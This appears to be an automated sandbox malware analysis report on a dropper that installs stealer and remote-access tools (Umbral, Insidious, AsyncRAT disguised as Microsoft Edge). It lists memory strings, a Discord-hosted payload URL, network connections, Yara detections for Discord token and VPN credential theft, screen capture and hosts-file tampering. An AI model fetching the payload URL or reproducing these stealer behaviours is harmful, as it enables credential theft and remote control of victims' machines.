                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB5E5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://media.discordapp.net/attachments/1277266726186385433/1281762825542303845/Umbral-927537.zip?e
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB5E3A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://media.discordapp.net/attachments/1277266726186385433/128176282554=
                            Source: powershell.exe, 00000006.00000002.2309953331.00000118AA631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2407960339.000001AB25905000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                            Source: Insidious.exe, 0000000B.00000000.2093948951.0000024510882000.00000002.00000001.01000000.00000009.sdmp, Insidious.exe.4.drString found in binary or memory: https://steamcommunity.com/profiles/ASOFTWARE
                            Source: tmp2887.tmp.tmpdb.11.drString found in binary or memory: https://support.mozilla.org
                            Source: tmp2887.tmp.tmpdb.11.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                            Source: tmp2887.tmp.tmpdb.11.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
                            Source: Insidious.exe, 0000000B.00000002.2237867422.00000245226D2000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000002.2237867422.00000245226ED000.00000004.00000800.00020000.00000000.sdmp, tmp2876.tmp.dat.11.dr, tmp2855.tmp.dat.11.drString found in binary or memory: https://www.ecosia.org/newtab/
                            Source: Insidious.exe, 0000000B.00000002.2237867422.00000245226D2000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000002.2237867422.00000245226ED000.00000004.00000800.00020000.00000000.sdmp, tmp2876.tmp.dat.11.dr, tmp2855.tmp.dat.11.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                            Source: tmp2887.tmp.tmpdb.11.drString found in binary or memory: https://www.mozilla.org
                            Source: tmp2887.tmp.tmpdb.11.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                            Source: tmp2887.tmp.tmpdb.11.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                            Source: tmp2887.tmp.tmpdb.11.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                            Source: tmp2887.tmp.tmpdb.11.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                            Source: tmp2887.tmp.tmpdb.11.drString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                            Source: tmp2887.tmp.tmpdb.11.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/:
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49707 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49715 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49716 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49718 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49719 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49720 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49721 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49722 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49723 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49724 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49725 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49726 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49727 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49729 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49730 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 162.159.135.232:443 -> 192.168.2.5:49732 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49734 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49735 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49739 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49742 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49748 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49749 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49750 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49751 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49754 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49756 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49758 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49759 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49761 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49763 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49765 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49766 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49768 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49770 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 162.159.135.232:443 -> 192.168.2.5:49771 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49773 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49774 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49776 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49778 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49780 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49781 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49784 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 162.159.135.232:443 -> 192.168.2.5:49786 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49788 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49790 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49795 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49799 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49800 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49804 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49806 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49808 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49809 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49813 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49817 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49821 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49824 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49826 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49831 version: TLS 1.2

                            Key, Mouse, Clipboard, Microphone and Screen Capturing

                            barindex
                            Contains functionality to capture screen (.Net source)
                            Source: Insidious.exe.4.dr, Screen.cs.Net Code: GetScreen

                            E-Banking Fraud

                            barindex
                            Yara detected BlackGuard
                            Source: Yara matchFile source: 11.0.Insidious.exe.24510880000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000B.00000000.2093948951.0000024510882000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Insidious.exe, type: DROPPED

                            Spam, unwanted Advertisements and Ransom Demands

                            barindex
                            Modifies the hosts file
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeFile written: C:\Windows\System32\drivers\etc\hosts

                            Operating System Destruction

                            barindex
                            Protects its processes via BreakOnTermination flag
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information set: 01 00 00 00 Jump to behavior

                            System Summary

                            barindex
                            Malicious sample detected (through community Yara rule)
                            Source: 3.0.Microsoft Edge.exe.b80000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 4.2.Nursultan2.exe.12f60e40.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                            Source: 14.0.Umbral.exe.1dcb4050000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                            Source: 0.2.Nursultan.exe.128b3a60.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 3.2.Microsoft Edge.exe.12ef1a78.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 4.2.Nursultan2.exe.12f60e40.1.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                            Source: 11.0.Insidious.exe.24510880000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                            Source: 11.0.Insidious.exe.24510880000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                            Source: 11.0.Insidious.exe.24510880000.0.unpack, type: UNPACKEDPEMatched rule: Detects A310Logger Author: ditekSHen
                            Source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 00000000.00000002.2042796854.0000000012898000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 00000003.00000000.2041682947.0000000000B82000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 0000000B.00000000.2093948951.0000024510882000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                            Source: 0000000B.00000002.2166607567.0000024512696000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                            Source: 00000003.00000002.3336137166.0000000012EF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: Process Memory Space: Insidious.exe PID: 5340, type: MEMORYSTRMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                            Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uOWQK.scr, type: DROPPEDMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                            Source: C:\Users\user\AppData\Roaming\Microsoft Edge, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe, type: DROPPEDMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe, type: DROPPEDMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe, type: DROPPEDMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe, type: DROPPEDMatched rule: Detects A310Logger Author: ditekSHen
                            Source: C:\Users\user\Desktop\Nursultan.exeCode function: 0_2_00007FF848E60A210_2_00007FF848E60A21
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeCode function: 2_2_00007FF848E70A212_2_00007FF848E70A21
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeCode function: 3_2_00007FF848E512903_2_00007FF848E51290
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeCode function: 3_2_00007FF848E56E723_2_00007FF848E56E72
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeCode function: 3_2_00007FF848E517193_2_00007FF848E51719
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeCode function: 3_2_00007FF848E560C63_2_00007FF848E560C6
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeCode function: 3_2_00007FF848E520F13_2_00007FF848E520F1
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeCode function: 3_2_00007FF848E5108D3_2_00007FF848E5108D
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeCode function: 4_2_00007FF848E60A414_2_00007FF848E60A41
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeCode function: 5_2_00007FF848E70A215_2_00007FF848E70A21
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF848F430E96_2_00007FF848F430E9
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeCode function: 10_2_00007FF848E60A4110_2_00007FF848E60A41
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeCode function: 11_2_00007FF848E9213D11_2_00007FF848E9213D
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeCode function: 11_2_00007FF848EA54D211_2_00007FF848EA54D2
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeCode function: 11_2_00007FF848EA472611_2_00007FF848EA4726
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeCode function: 11_2_00007FF848E9501011_2_00007FF848E95010
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeCode function: 11_2_00007FF848E913D311_2_00007FF848E913D3
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeCode function: 11_2_00007FF848E913B811_2_00007FF848E913B8
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeCode function: 12_2_00007FF848E70A2112_2_00007FF848E70A21
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeCode function: 13_2_00007FF848E9171913_2_00007FF848E91719
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeCode function: 13_2_00007FF848E920F113_2_00007FF848E920F1
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeCode function: 13_2_00007FF848E9103813_2_00007FF848E91038
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF848E8B93814_2_00007FF848E8B938
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF848E8B91014_2_00007FF848E8B910
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF848EC8A4014_2_00007FF848EC8A40
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF848E91B6414_2_00007FF848E91B64
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF848E7F04814_2_00007FF848E7F048
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF848E7722814_2_00007FF848E77228
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF848E8321814_2_00007FF848E83218
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF848EC44F014_2_00007FF848EC44F0
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF848EC456814_2_00007FF848EC4568
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF848E8B5F914_2_00007FF848E8B5F9
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF848E8B72D14_2_00007FF848E8B72D
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF848E8A72014_2_00007FF848E8A720
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF848E8B88814_2_00007FF848E8B888
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF848E8581814_2_00007FF848E85818
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF84904520214_2_00007FF849045202
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF84904023014_2_00007FF849040230
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF84903E25A14_2_00007FF84903E25A
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF84903C28114_2_00007FF84903C281
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF84904892214_2_00007FF849048922
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF8490459B114_2_00007FF8490459B1
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF849045CE214_2_00007FF849045CE2
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF849033CE414_2_00007FF849033CE4
